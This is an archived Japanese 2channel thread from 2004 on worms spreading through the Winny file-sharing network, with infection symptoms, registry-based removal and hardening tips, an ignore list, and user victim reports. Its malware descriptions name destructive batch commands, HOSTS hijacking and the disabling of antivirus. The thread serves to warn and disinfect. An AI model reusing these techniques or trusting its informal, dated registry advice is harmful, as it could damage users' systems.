5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【警報】Winnyを狙ったワーム・ウイルス情報 Part26

1 :[名無し]さん(bin+cue).rar:04/09/11 12:10:15 ID:j8DDPfNG
Winnyで流れているワーム、ウイルス等の報告・調査・対処をするスレです。
質問はテンプレを読んでからにして下さい。
読まずに質問しても「テンプレ嫁」と切り返されるだけです。
余裕があれば過去ログにも目を通してください。
なお、ここは初心者の質問スレではありません。

■流行種
・元祖Antinny系 ・キンタマ系 ・batファイル ・スクリーンセーバー etc

■流行感染パターン
・exeの前にスペースたくさん(例:「秘密の写真.jpg         .exe」等)
・拡張子が.folderに変更されたHTMLからexeを実行させる
・autorunからbatファイルを実行させる
・スタートアップに解凍させ、再起動後exeを実行させる

■DL後のちょっとした注意
・落としたファイルは必ずウイルススキャンする
・exeファイルはうかつに実行しない
・ファイルのアイコンが偽装されてないか確認する

■全ての感染者に共通の、絶対確実な対処方法
ハードディスクをフォーマットした上で、Windowsの再インストールをする。
上書きインストールではダメです。
現在ハードディスクにあるデータは消えるので、待避するなり諦めるなりしてください。

前スレ
【警報】Winnyを狙ったワーム・ウイルス情報 Part25
http://tmp4.2ch.net/test/read.cgi/download/1093270545/l50

テンプレまとめ http://www.geocities.jp/kemkzuenc/Antinny.html
Antinny対策サイト ttp://nyweb.hp.infoseek.co.jp/

2 :[名無し]さん(bin+cue).rar:04/09/11 12:10:32 ID:VXAZ/sf7


3 :[名無し]さん(bin+cue).rar:04/09/11 12:11:13 ID:j8DDPfNG
■質問テンプレ
質問の際、あなたのPC環境やウイルスソフトがわからないと対処できません。
テンプレに沿って答えることで解答が出やすくなります。

【使用OS】
【WindowsUpdateしてるか】
【AntiVirusは】
【ちゃんとUpdateしてるか】
【スキャンした結果】
【オンラインスキャンしたならその結果は】
【Winnyのバージョン】
【Winny歴、総DL量は】
【テンプレを読んだか】
【テンプレにある対策を実行したか】
【症状か具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】

4 :[名無し]さん(bin+cue).rar:04/09/11 12:12:12 ID:j8DDPfNG
■推奨無視リスト
このままIgnore.txtにコピペしてください。

.exe,,0,0,,0,1,0
.jpg,,0.0085,0.0088,,0,1,0
.jpg .lzh,,0,0,,0,1,0
.g .lzh,,0,0,,0,1,0
.avi .lzh,,0,0,,0,1,0
.m .lzh,,0,0,,0,1,0
.w .lzh,,0,0,,0,1,0
.txt .lzh,,0,0,,0,1,0
.rar .lzh,,0,0,,0,1,0
.cab .lzh,,0,0,,0,1,0
.exe .lzh,,0,0,,0,1,0
※無視リストを追加しすぎるとマシンに負荷が掛かります。

5 :[名無し]さん(bin+cue).rar:04/09/11 12:12:32 ID:BVXt38HJ
ぬるぽ

6 :[名無し]さん(bin+cue).rar:04/09/11 12:13:08 ID:j8DDPfNG
■感染しないための注意1 〜やっておくべき設定等〜
・アンチウイルスソフトのインストール及び常駐、定期的な更新。
・シングルクリックをダブルクリックにしてうっかり操作防止。
・ファイルの拡張子は表示させておく。できれば詳細表示を使うか、ファイラを使う。
・nyをProgramFilesに置かない。CacheとDownフォルダは詳細表示にする。
・CD/DVDドライブのAutorun(自動実行)は切っておく。(やり方は以下参照)
・適切な無視リストの設定などで、そもそもウイルスを呼び込まない。(リストは以下参照)
・whiter対策としてC:\Windows\Systemに「Whismng.exe」というフォルダを作成。
 (フォルダ名と同じファイルは置けないのである程度防止になる)
・WhiterVBS簡易チェッカーを使う。
 ttp://mxtrojan.at.infoseek.co.jp/column02.html
・IEのセキュリティ設定を厳しくする。特にActiveXコントロールとプラグインを無効orダイアログ表示に。
 (拡張子.folderで悪意のあるコードを含んだhtmlを読み込むバグ、悪用の危険あり)
 ttp://internet.watch.impress.co.jp/cda/news/2004/01/30/1927.html
・XMLのOBJECT要素によってコマンドを起動するバグ対策に、
 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0にあるFlagsの値を10進数で1に変更する。
・フォルダアイコン、txtアイコンを標準のものから変更しておく。
  (アイコンを偽装したexeを見分けるため。aviやヘルプなど他の拡張子も変更が望ましい)
・レジストリ:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run のアクセス権を制限する。
 ※アプリケーションのインストール時に弊害が起こることもあるので注意。

7 :[名無し]さん(bin+cue).rar:04/09/11 12:14:12 ID:j8DDPfNG
■感染しないための注意2 〜普段からの注意〜
・大事なデータはこまめにバックアップを取る。
・落としたファイルは必ずウイルススキャンする。
・指定外の場所へ解凍される脆弱性がある解凍ソフトがあるので対応済のソフトを使う。
 ttp://www.forest.impress.co.jp/article/2004/07/30/arcsecurity.html
・解凍ソフトはWinRARなど中身を確認できるアーカイバを使う。
・lzh,zip,rarなど圧縮ファイルは解凍後も要注意。
・exeファイルの実行は完全自己責任。
・CDイメージ(CCD等)はautorunを切ってからマウントし、更に実行ファイル(setup.exe等)をウイルススキャンする。
・怪しい・危険なファイルはWinnyFileDatabaseでチェックする。
 ttp://p46.aaacafe.ne.jp/~nydb/

CD/DVDドライブのAutorun(自動実行)の切り方
 ◆Win9x、Meの場合
  1.[マイ コンピュータ]-[プロパティ]-[デバイスマネージャ]-[CD-ROM]-[プロパティ]-[設定]を開く
  2.オプション項目の「挿入の自動通知」のチェックを外す
 ◆Win2000、XPの場合
  1.[スタート]−[ファイル名を指定して実行] から regedit を起動
  2.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom を展開
  3.右の「AutoRun」値のデータを0に設定
※設定変更後、必ず再起動すること。再起動しないと有効になりません。
※また窓の手などでソフトでも簡単にオフに出来る。
※DaemonToolsの自動起動とは別です。これをオフにしても自動実行は切れません。

8 :[名無し]さん(bin+cue).rar:04/09/11 12:15:15 ID:j8DDPfNG
★流行種その1
【キンタマ(W32.AntiWinny.K等)】
■感染ルート
・nyあるいはそれ以外の方法でキンタマワームを踏んで感染。
・IEや拡張子「.folder」のバグを利用し、自動実行させ感染。
■症状(感染確認方法)
・Upfolder.txtに登録したことのないフォルダが登録される。
・レジストリエディタ(regedit.exe)を開こうとするとメモ帳が開く。
・"C:\Documents and Settings\ユーザー名\Local Settings\Temp" に"ユーザー名.txt"が作成される。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 に名前xxx データC:\Program Files\xxx\xxx.exeが登録される。
・スタートアップに該当プログラムが登録される。(msconfigで確認)
・etc.(亜種により様々)
■活動内容(亜種毎に違います)
・Winnyとは関係なくランダムな時間にデスクトップのスクリーンショットを取る。
・デスクトップ上のファイルをまとめて [キンタマ] 俺のデスクトップ PCのユーザー名[日付](ファイル詰め合わせ).lzh という名前でupフォルダに置く。
・UpFolder.txtを書き換えてファイルを勝手にアップロードする。
・Winnyを接続すると知らない間に勝手にこれらをダウンロードする。
・各exeファイルはそのアイコンの本来の動作も同時に行う。
 (例えばjpgアイコンに偽装したexeを起動すると、ワームが実行されると共に画像も表示されるため気づきにくい)
■駆除方法
・Winnyをフォルダごと削除、そしてWinnyを再び入れ直す。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runの怪しい値を削除する。
・C:\Program Files\xxx\xxx.exeを削除、 スタートアップからも該当プログラム削除。
■予防
・なるべく関わらない。推奨無視ワード「キンタマ」「デスクトップ」
・今回に関わらず、落とした.exeファイルの実行は控える。
■まとめサイト
ttp://www.geocities.jp/kim_virus/
ttp://myui.s53.xrea.com/kin/index.html
ttp://chiakis-web.hp.infoseek.co.jp/kintama-v/

9 :[名無し]さん(bin+cue).rar:04/09/11 12:16:31 ID:j8DDPfNG
★流行種その2
【Antinny.ms(仮称)】
 Antinny.Bの亜種? サイズ 1.26MB 開発名 SilentToker Delphi製
 ファイルバージョン5.1.3125.1093 製品バージョン6.00.1800.1007
■症状(感染確認方法)
・Windowsフォルダにsvchost.exeを作成。(無い場合もあり)
 (Systemフォルダにあるsvchost.exeは問題ありません)
・UpFolder.txtに名前BBSでダウンフォルダを追加。
・アップ(ダウン?)フォルダのZIP、LZH、RAR(?)に感染。感染の際にアイコンを自ら変更する。
・アンチウイルスソフト(ノートン、バスター)の自動実行を無効にする。
・親と子があり、いずれもSystemフォルダに作成される。子はms???.exe(248k)。親はms???.exe(282k)
 (子を消しても、再起動すると親が子を再度作成する)
・親はサービスに登録される。
・子はHOSTSを書き換えてWindowsUpdateやSymantecなどに接続不可にする。
・親と子はノートンでトロイとして検出される。バスターは未対応?
■活動内容
・毎月第一月曜日に発動。行動内容は不明。
■対策
1. 親のファイル名が含まれるレジストリキーを削除。
  Win2k、XPの場合HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ 内にある。
  (Win9X、MEの場合は不明)
2. セーフモードで再起動し、親子ともどもファイルを削除。
3. HOSTSファイルを開き、宛先が0.0.0.0の行を全部削除。
  HOSTSファイルは \Windows\System32\Drivers\etc\Hosts をメモ帳などで開く。
4. NyのUpフォルダ設定を元に戻す。
5. ノートンやバスター等のワクチンソフトを再インストール。
  バスターはPCCTool.exeを使えば再インスコせずに済む。

10 :[名無し]さん(bin+cue).rar:04/09/11 12:17:38 ID:j8DDPfNG
★流行種その3
【Autorun+bat】
5種類以上の亜種がある。
■感染ルート
・主にエロゲのイメージファイルをマウントした時やSetupを実行した時に感染。
・Setup.batやSetup.exeを実行させることで感染。
■活動内容(版により活動は異なる)
・deltree、del、rmコマンドでファイル削除。
・bug.exeで気をそらす。
・reg deleteコマンドでレジストリ全削除。
・スタートアップに自身を登録し、再起動毎に活動する。
・レジストリのRunやRunOnceに自身を登録し、再起動毎に活動する。
・システムの復元の無効化。
・Windowsファイル保護の無効化。
・使用者名・企業名変更。
・レジストリエディタ本体及びdllcacheやi386フォルダ内のバックアップの削除。
 (削除したファイルと同名のフォルダを作成する)
・強制再起動
・html(ACCS・JASRACへの田代砲)起動をatコマンドでスケジュールする。
・壁紙のエロCGへの変更(画面のプロパティでの修正は不可)
■駆除方法(版により対処法は異なる)
・batファイルに書かれたDOSコマンドを読んで、加えられた変更を元に戻す。
■対策
・batファイルを不用意に実行しない。
・exeの実行は自己責任で行う。あまりアンチウイルスソフトは役に立たない。

11 :[名無し]さん(bin+cue).rar:04/09/11 12:18:47 ID:j8DDPfNG
★流行種その4
【スクリーンセーバー(仮称)】
・サイズは4,553,632Byte、アイコンはフォルダに偽装。
・感染者が流す圧縮ファイルにある偽装されたウイルス本体から感染の模様。
■症状(感染確認方法)
・ny起動すると画面が真っ黒になり
 赤い文字で「winnyで違法なファイルを集めています」と文字が流れる。
・マウス動かすとログオフ画面に切り替わる。
・起動時にアドレス帳が勝手に立ち上がる。
・タスクマネージャを起動できないようにする。(情報錯綜)
■活動内容
・C:\WINNT\Web\Wallpaperのフォルダが開く。(意味は不明)
・C:\WINDOWS\bugfixというフォルダを作り2つの圧縮ファイル作成。
 [任意ワード][NullPorce] 俺のアドレス帳&お気に入り ユーザー名.zip
 私はユーザー名、Antinnyの作者だ。.zip
・UpFolder.txtに「Path=C:\WINDOWS\bugfix」ができてる。
・Winny.exeが置いてあるフォルダに、"NullPorce2MX.exe" 22,528Byteができる。
・C:\WINNTにWindowsXPのフォルダに偽装したexeファイルを3つ?作る。
・そのexeファイル名はシステムに使用されるものをランダムに使用の模様。
 (報告済み:CTFMON.EXE、Exploder.exe、IMEJPMlG8.0.exeなど、どれも45,056バイト)  
・レジストリに以下を追加し、起動時の自動実行が設定される。
 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
・また以下も追加、作用は不明?値はGalaxian Explosion
 HKEY_CURRENT_USER\Software\VB and VBA Program Settings\NullPorce2\Attribute
■対策
・C:\WINDOWS\system\にあるwnconfig.txtとアイコンが偽装しているexe削除。
・C:\WINDOWS\bugfix\の中に生成されてる2つのファイルを削除。
・nyを入れてるフォルダにあるUpFolder.txtを削除。
・レジストリで怪しいキー削除。

12 :[名無し]さん(bin+cue).rar:04/09/11 13:37:53 ID:3C8JJIaR
>>1 乙乙

13 :[名無し]さん(bin+cue).rar:04/09/11 15:08:12 ID:9+vCck7s
   \    |       ,,...-‐‐‐--、,      l    /     /      /      /
     |、  /  |   ,.べ;;;;;::、--- 、:::;;`ヽ、   ''‐-‐'゙/   /      /      /
   、,_,.! ゙'-'゙(.    //::/´       ``ヾ、      l         /      /
    )    (.  /:,`!ヾ、.      ,      ゙>-    ヽ、_,,./  /      /
   '゙"`ヽ, /``/::;:゙;゙::!:.:| ``'''‐--‐''゙   '-‐'゙ ゙、       /         /
     ヽ ヾ /:;'/:.:!:::l  、,r''"゙`'ヾ    ,:',-‐-、,'l      /       /
   -=,'゙   ./:::/:.:.|::::l  /  (・),.    ヾ,_(・) ,'゙l      (
     `ヽ ,゙:::,'::::;':!::::l   `"´ ''"´     | ̄__,,l,,...,,_   \     >>1乙っ・・・!!!
     -='゙ l::::l::::;':. l:::::l               ` ゙、.,,_,,.``ヽ、
     __) l!゙,l:::;'-、 ';::::!          ,.-‐‐:、    l `ヽ、  \
      ヽ. !:l:::l/-ヽ.゙;::',    U    /:::::::::::r=‐'''"´`''‐,.-゙'‐-、ヽ.
       ) ゙!::l l"''、l ヾ゙:、   u     l:::::::::::::::`'''‐‐''''‐i'゙  ,,..、  `\
         l:::l,ヽ、_,  ヾ;\       ゙、.,,_ノ/ ̄ ̄ノ /ヽ. `   \     ____
     /    !::l:゙ヽ、. ,、 ヾ、;、         ゙'‐''"7'゙/ /゙ヽ       \ _,./´-、ヽ.`´ ̄``
   / /  l::l``;::,`´:ヽ、  `ヾ:;、.,__   ::::   / `'''゙  \   ゙、   ヾ;‐、''-、゙; ヽ\::`
    /  / l:l ";'::;'::';';! `''‐ 、.,_` ̄      / r'゙´ ̄ ̄``'''‐、 ゙、    ' l  l:::! ゙、 ヽ`
.       /  l:!  !:;'::!::::;!     ``'''‐‐---┬'゙   `'''''''''‐-、      ゙、   ./  l:::l    ヾ


14 :[名無し]さん(bin+cue).rar:04/09/11 20:42:22 ID:R5Y0diuS
 どなたか助けてください!!
 
【使用OS】xp
【WindowsUpdateしてるか】yes
【AntiVirusは】いれてます
【ちゃんとUpdateしてるか】yes
【スキャンした結果】検索されず
【オンラインスキャンしたならその結果は】検索されず
【Winnyのバージョン】v2.0b7.1
【Winny歴、総DL量は】1年、不明
【テンプレを読んだか】yes
【テンプレにある対策を実行したか】yes
【症状か具体的に、分かる限りすべて書く】winny起動中に勝手にpcが再起動する。
【何をしたらそんなことになったのか】回線を新しくして、winnyを始めたら。
【これまでにとった措置】フォーマット、os再インストール


15 :[名無し]さん(bin+cue).rar:04/09/11 20:44:24 ID:UILFV8df
新スレひとつめの質問が釣りだった
スレがこの先生きのこるには・・・・

16 :[名無し]さん(bin+cue).rar:04/09/11 20:48:13 ID:0rMaQy8O
> 【スキャンした結果】検索されず
> 【オンラインスキャンしたならその結果は】検索されず

“されず”って意味不明。
もしかして検索っていう単語をご存じない?

あと症状はもっと具体的に書け。
独り言を言いに来たのならそれくらいでも構わんが。

17 :[名無し]さん(bin+cue).rar:04/09/11 20:48:48 ID:0rMaQy8O
ウヒョー上げちゃったよスマソ

気を取り直して>>1

18 :[名無し]さん(bin+cue).rar:04/09/11 20:53:58 ID:OUP58sX5
winnyのボタンなどのコントロールがすべて顔文字になったんですが、
ウイルスでしょうか?


19 :[名無し]さん(bin+cue).rar:04/09/11 21:02:07 ID:R5Y0diuS
>>16
すいません。言葉を間違いました。検索されずというか
ウイルスは見つかりませんでした。
winny自体は普通に使えるのですが、起動して数分たつと
急にpcが再起動してしまうのです。後、今さっきなんですが、
タスクマネージャーが「管理者によって使用不可にされています」
というメッセージが出て立ち上がらなくなりました。


20 :[名無し]さん(bin+cue).rar:04/09/11 21:15:42 ID:WN/GQP8y
「けんしゅつされず」で変換しよう

21 :[名無し]さん(bin+cue).rar:04/09/11 21:19:24 ID:XgAa+hJD
>>19
XPにはadmin権限でログインしてるのかなぁ?
フォーマットしてOS再インストしたのなら、そのOSは正規版なの?
じゃぁなかったらHDDのブートセクタあたりに何かされたかもね。
あとは、メモリとかHDDが死んでるというのも考えられるけど。
単純にハードの不具合を疑うべきかもね。電源が不安定だとか...

>>18
なんかのいたずらソフトを踏んだんじゃぁ...
ウイルスではないと思われ。


22 :[名無し]さん(bin+cue).rar:04/09/11 21:22:41 ID:jozF2TAc
前25すれの908だけど
最近全消しくらたった香具師いる?いたらどんな症状だったか教えて

23 :[名無し]さん(bin+cue).rar:04/09/11 21:51:05 ID:H5ipycLJ
  ∧_∧
(´・ω・) スレ立て人さん乙
( つ旦O ∫ ∫ ∫ ∫ ∫ ∫ ∫
と_)_) 旦 旦 旦 旦 旦 旦 旦


24 :[名無し]さん(bin+cue).rar:04/09/11 22:02:40 ID:i25Hmb6L
>>14
os再インストールのやり方に触れてないあたりが判断付きかねるが、
ハードの可能性はあるな。メモリエラーならその旨を告げるメッセージが出てくるが。

25 :[名無し]さん(bin+cue).rar:04/09/11 22:08:58 ID:4N1CSF1L
ヌルポースが入ってるファイルのハッシュください

26 :[名無し]さん(bin+cue).rar:04/09/11 22:57:07 ID:hpy9Alx3
>>1
GJ!!

27 :[名無し]さん(bin+cue).rar:04/09/11 23:04:46 ID:7Jw7/j2x
>>1
激しく乙


>>22
age厨にゃ(ry

28 :[名無し]さん(bin+cue).rar:04/09/11 23:07:08 ID:ez66s8QT
>>22
980あたりが教えてくれるよ!

29 :[名無し]さん(bin+cue).rar:04/09/11 23:18:53 ID:hyIP8ab0
0b9bc90f088ecef9f2b098f800a8803d

30 :[名無し]さん(bin+cue).rar:04/09/11 23:27:24 ID:74oyAX5Z
過去スレ
Part1 http://tmp.2ch.net/test/read.cgi/download/1060003283/
Part2 http://tmp.2ch.net/test/read.cgi/download/1060385909/
Part3 http://tmp.2ch.net/test/read.cgi/download/1060700316/
Part4 http://tmp.2ch.net/test/read.cgi/download/1061551896/
Part5 http://tmp.2ch.net/test/read.cgi/download/1063637671/
Part6 http://tmp2.2ch.net/test/read.cgi/download/1066288327/
Part7 http://tmp2.2ch.net/test/read.cgi/download/1068654569/
Part8 http://tmp2.2ch.net/test/read.cgi/download/1072600676/
Part9 http://tmp2.2ch.net/test/read.cgi/download/1075998916/
Part10 http://tmp2.2ch.net/test/read.cgi/download/1078207953/
Part11 http://tmp2.2ch.net/test/read.cgi/download/1079425731/
Part12 http://tmp2.2ch.net/test/read.cgi/download/1079449665/
Part13 http://tmp2.2ch.net/test/read.cgi/download/1079540824/
Part14 http://tmp2.2ch.net/test/read.cgi/download/1079918577/
Part15 http://tmp2.2ch.net/test/read.cgi/download/1080816795/
Part16 http://tmp2.2ch.net/test/read.cgi/download/1081307106/
Part17 http://tmp2.2ch.net/test/read.cgi/download/1082190076/
Part18 http://tmp2.2ch.net/test/read.cgi/download/1083335282/
Part19 http://tmp3.2ch.net/test/read.cgi/download/1084036887/
Part20 http://tmp3.2ch.net/test/read.cgi/download/1084808432/
Part21 http://tmp4.2ch.net/test/read.cgi/download/1086794458/
Part22 http://tmp4.2ch.net/test/read.cgi/download/1089460762/
Part23 http://tmp4.2ch.net/test/read.cgi/download/1091063187/
Part24 http://tmp4.2ch.net/test/read.cgi/download/1092058756/


31 :[名無し]さん(bin+cue).rar:04/09/11 23:48:24 ID:Zx2pZ/dh
>>1 乙乙
>>1 乙乙
>>1 乙乙

32 :すらすら:04/09/12 00:01:29 ID:NeUnnu5z
OS:Windows2000Pro
ウイルスにレジストリエディタがメモ帳にされてしまったんですが、
テンプレなど見てもわかりませんでした。
2000の場合はレジストリエディタの復元はどの様な手順で行えばいいんでしょうか?
どなたか教えて下さい。



33 :[名無し]さん(bin+cue).rar:04/09/12 00:03:10 ID:UThH3Yek
>>32
一日5回、嘆きの壁に向かって額を地面にすりつけて土下座して祈る

34 :[名無し]さん(bin+cue).rar:04/09/12 00:04:03 ID:G6zWAmzi
>>32
リカバチ

なお、ここは初心者の質問スレではありません

35 :[名無し]さん(bin+cue).rar:04/09/12 00:04:19 ID:n2f8knYi
>>32
再インストしたほうが早いぞ。
ちゃんと駆除できるかどうかわからんし。

36 :[名無し]さん(bin+cue).rar:04/09/12 00:25:33 ID:l2gAYMtH
生まれて初めて(PC暦10年くらい)、ウィルスにかかった。
かなりショック。 

ウィルスにかかったやつを横目でみながら馬鹿目とおもって
いたが、それが自分になるとは、つくづく甘い。
25000のmp3ファイルのうち10000死んだ。
しかし、15000残ってよかった。


37 :[名無し]さん(bin+cue).rar:04/09/12 00:28:18 ID:5o1uU2ZZ
>>36
ここはお前の(ry (AAry

38 :[名無し]さん(bin+cue).rar:04/09/12 00:29:12 ID:UThH3Yek
>>36
バックアップ取らない方が異常。
ウイルスどころか、HDDクラッシュしたら全滅する。
しかも確率的にはHDDクラッシュの方が高い。

39 :[名無し]さん(bin+cue).rar:04/09/12 00:29:35 ID:qTtDiWRY
>>32
ってことはキンタマ踏んだのか。それは、もうダメポ。

女王様のヒールで、踏んでもらうしか対処法がない。

40 :[名無し]さん(bin+cue).rar:04/09/12 00:40:58 ID:Xb2g9QJD
>>33
ワロタ

41 :[名無し]さん(bin+cue).rar:04/09/12 00:57:59 ID:57pFSrI0
>>36
微笑女戦士セーラーフーン

          @ノノハ@
         /( ´_ゝ`)ヽ   <フーン、で何?       
.       ='ア\ ヽ__/`〉フ\       
      //´\`ー  // \ \     
     // |  _〈ノ'~´`/ヽ \ .\     
     / l ヽーヾノ !/´゙、フ   \. \     
     | { `ー`ー、_ノ_丿 ハ    \. ヽ
      \\  . ! V ̄i´`ー`    ヽ )
       `ー''´ |  |!  |       //
      `ー''´ /. /!  i      //
          /ヽ/ ヽ '、    //
          !::::/  \:::\   i´
.          |:::/    \::ヽ 
         |:::l      \:ヽ
         i::::〉       ヾ::ヽ
         レ         }:::!〉
                   ー'´   
遅くなったが>>1乙!

42 :[名無し]さん(bin+cue).rar:04/09/12 00:58:53 ID:UThH3Yek
>>41
笑ってないじゃん。

43 :36:04/09/12 01:16:51 ID:l2gAYMtH
>>41
いや、まあ、被害がこれだけですんでラッキーだった。と。

Eドライブが生存10155, 死亡5641
Fドライブが生存7872, 死亡4066

なんで、1/3 なんだろ?

というわけで、みなさん、俺と同じ目にあわないように、
ちゃんとバックアップはとりましょう。以上、反面教師でした。

>>36
全部で2Tくらいあるので、バックアップとりづらかった。
I/Oの1T買います。

44 :[名無し]さん(bin+cue).rar:04/09/12 01:23:34 ID:5c9jGlxe
>>36
mp3なんてそんなにHDにためててなんに使うの?

45 :36:04/09/12 01:46:27 ID:l2gAYMtH
Network 越しに会社で聞いている。
その他、DB使って、検索機能(ひらがな検索対応)で、聞きたく歌手の
曲目リストをつくり、その中でランダムに聞けるなど、(日本の)商用
サイトと伍するものをつくって遊んでいました。

結構、自作も多かったんだけどねー。(320kbpsでつくるため)
このドライブはレイド組んでいたので、完全に油断していた。

46 :[名無し]さん(bin+cue).rar:04/09/12 01:57:56 ID:57pFSrI0
>>45
で、何やって感染したの?

47 :[名無し]さん(bin+cue).rar:04/09/12 02:45:43 ID:qTtDiWRY
キンタマ亜種の9/9 時限発動(mp3/zip上書きパターン)なのでは?

48 :[名無し]さん(bin+cue).rar:04/09/12 02:51:41 ID:RpHqhuF4
てs

49 :[名無し]さん(bin+cue).rar:04/09/12 13:56:54 ID:cqTnAv9H
>というわけで、みなさん、俺と同じ目にあわないように、
>ちゃんとバックアップはとりましょう。以上、反面教師でした。

よい子は普通にバックアップ取ってますが何か?
そういう用途に使っていたとしても、別にバックアップを取るのは当たり前

50 :[名無し]さん(bin+cue).rar:04/09/12 14:07:25 ID:isIvEkRH
バックアップなんかとったこと無いなぁ・・・

51 :[名無し]さん(bin+cue).rar:04/09/12 14:12:49 ID:tDJFb00U
>>36
お仲間かな?
自分とそっくり。PC歴はもっと長いが、私も初めて被害らしい被害にあった。
mp3やjpgが大量にtextファイルになっていた。全部202KBの中身が「ヌルポ-ガッ」。
件数をチェックしなかったのでよくわからないが、5,000から10,000くらいだと思う。
私の場合、OSが起動しなくなってシステムをリカバリした後で気がついた。

最初はPCに潜り込まれてシステム書き換えや個人情報を取られたと思って
愕然としていたが、そうでもなさそうで、そういえば、うっかりjpgに見せかけた
exeを実行させてしまったことを思い出した。9/9でした。
例のヌルポAAがJPGで出てきたなー。

>>36さんと状況は同じですか?


52 :[名無し]さん(bin+cue).rar:04/09/12 14:17:14 ID:GSDHIhqx
バックアップなんてとらず、機会を見つけてはまっさらな環境にして気分を晴らすって考え方もありだと思うよ。
ただ、その場合でもウィルスに感染したら他人に被害を拡げないうちに対処できるようじゃなきゃ、だめだけど。


53 :[名無し]さん(bin+cue).rar:04/09/12 14:59:43 ID:KXtNyAu4
俺でさえもWinny使ってるよ

54 :[名無し]さん(bin+cue).rar:04/09/12 15:15:42 ID:TNoqscHO
データが大事なのです。実行バイナリではなく。

55 :[名無し]さん(bin+cue).rar:04/09/12 16:29:04 ID:XFj6n946
\RECYCLER\NPROTECT\ に感染したファイルがあるっぽいんだけど直接削除しようとすると「ファイルまたはフォルダの削除エラー」とか出て削除できね・・・
AVGで検索かけると感染と出て、オンラインのバスターだと引っかからないんですけど、これって気にしなくてもよさげ?
つかノートンゴミ箱かと思ったけど違うみたいだし、\RECYCLER\NPROTECT\って何のフォルダでしたっけ?


56 :[名無し]さん(bin+cue).rar:04/09/12 17:00:08 ID:Df7MVvrt
ノートンゴミ箱?

57 :[名無し]さん(bin+cue).rar:04/09/12 17:01:13 ID:AO2USqMs
>>55
ノートン先生が作るフォルダらしいけど、バスター使いだからヨクワカンネ

58 :[名無し]さん(bin+cue).rar:04/09/12 17:09:53 ID:JhrY7Kjx
デスクトップに地蔵が出てきます!助けてください!

59 :[名無し]さん(bin+cue).rar:04/09/12 17:13:21 ID:UThH3Yek
>>58
残念ですが、お嬢さんは手遅れでした。

60 :[名無し]さん(bin+cue).rar:04/09/12 17:25:50 ID:az7iKiV6
>>58
なんか、ありがたい気がする・・・。
奇跡が起こったんだよ、きっと・・・。

61 :[名無し]さん(bin+cue).rar:04/09/12 17:27:24 ID:UThH3Yek
>>60
振り向けば、奴(地蔵)がいる

62 :[名無し]さん(bin+cue).rar:04/09/12 17:50:45 ID:FmKtPb+Y
なんかHDが壊れない物だと思っている人がタマ−にいるよね

退避なんてすんならHD買えばいいのに・・・とか。

63 :[名無し]さん(bin+cue).rar:04/09/12 18:15:45 ID:RzCls/0S
>>62
昔、「PCを使う人は二種類に分けられる。ハードクラッシュを経験したことがある人と、
これから経験する人だ。」って言葉読んだことがあるけど、ハードクラッシュって死語
かね?

64 :[名無し]さん(bin+cue).rar:04/09/12 18:37:17 ID:FmKtPb+Y
>>63
HDあぼーんしたら終わりじゃん・・・
ってレスしたら、

外付けの寿命ってどれくらい?
外付けって半永久的じゃないかなあ? とか返されたw

まあ、最初壊れるまであんま実感ないけどな、実際

65 :[名無し]さん(bin+cue).rar:04/09/12 19:02:14 ID:zPR8mykC
PCに足向けて寝てると結構早めにアボンするけどな。

66 :[名無し]さん(bin+cue).rar:04/09/12 19:03:10 ID:qTtDiWRY
nyしてると、HDDは2年ぐらいじゃねーの。
不良セクタでまくりで、物理フォーマットして代換エリア作らないと
使い物にならないし。

67 :[名無し]さん(bin+cue).rar:04/09/12 19:38:44 ID:zPR8mykC
>>66
OS用ドライブ
ツール用ドライブ
データ用ドライブ
映像用ドライブ
キャッシュ用ドライブ
テンポラリドライブ
OSバックアップ用ドライブ
緊急用補助OSドライブ

こんな感じで、データドライブとOSドライブはそれぞれミラーにしてるので、合計10台で稼動。
普段アクセスしないドライブはスリープな。

68 :[名無し]さん(bin+cue).rar:04/09/12 19:50:46 ID:TNoqscHO
>>67
回転機構を持つドライブは、電源入れたり消したりするよりも常時通電
しておいたほうが寿命長くなるらしいよ。ヘッド関連が固着しないよう
に、定期的にシークさせる工夫はいるそうだが。

あと、高回転ドライブは冷却しとくべき。
メーカー製の外付けドライブで静音を売りにして自然冷却なのが多いけ
ど、後付けでもいいからファン付けるかなにかしとこう。

69 :[名無し]さん(bin+cue).rar:04/09/12 20:17:36 ID:jbJF6p8X
おいおい自作板になってきてるぞ

70 :[名無し]さん(bin+cue).rar:04/09/12 20:22:58 ID:zPR8mykC
>>68
いずれも対策済み。

ちなみにドライブの裏にねじ止めで固定する市販のクーラー試したことあったけど、あれはあまり冷えないね。
1年くらいでFANが駄目になったよ。
普通にあまったCPUFANとかに適当な抵抗入れて横から冷却してる。CPいいし冷えるし一石二鳥。

HDDは全て内蔵な。

ああ、そういやむかし内蔵を内臓って書く奴多かったな。わざとなのか馬鹿なのかしらんが。

71 :[名無し]さん(bin+cue).rar:04/09/12 20:23:42 ID:zPR8mykC
>>69
( ̄□ ̄;)!!

72 :[名無し]さん(bin+cue).rar:04/09/12 20:25:01 ID:k5xjkfMl
内臓(←何故か最初の変換候補)

73 :36:04/09/12 20:45:45 ID:l2gAYMtH
>>51
仲間でした。キンタマウィルスに感染していました。
偽装exe は、踏んだつもりはないのですが、どこかでふんだんでしょうね。チェック甘い。
バックアップを取らない馬鹿というのは、まったくもって確かにその通りなのですが、
実は、結構、運が良かった。

 9/9に、何故か、外付けHDDが熱かったので、いったん全てOFFにしました。
今、考えるとウィルスが、スキャンしていたような気がします。(=こちらは被害なし) 
賢い人だったら、きっと原因を調べるんでしょうけど、
寝る前だったので、外付けHDDの電源をOFFにしてそのまま寝てしまいました。
おかけで?120x4+250x2は、災難を免れました。
この外付けは、自炊して出回っていない(というか出していない)データが
多数あったので、mp3を1万失っても助かったという感覚です。

あと、sambaでLinux と接続しているのですが、こちらの方も被害なし。
sambaなのか、それとも、ドライブが遠い(名前がX,Z)だったのか?は、
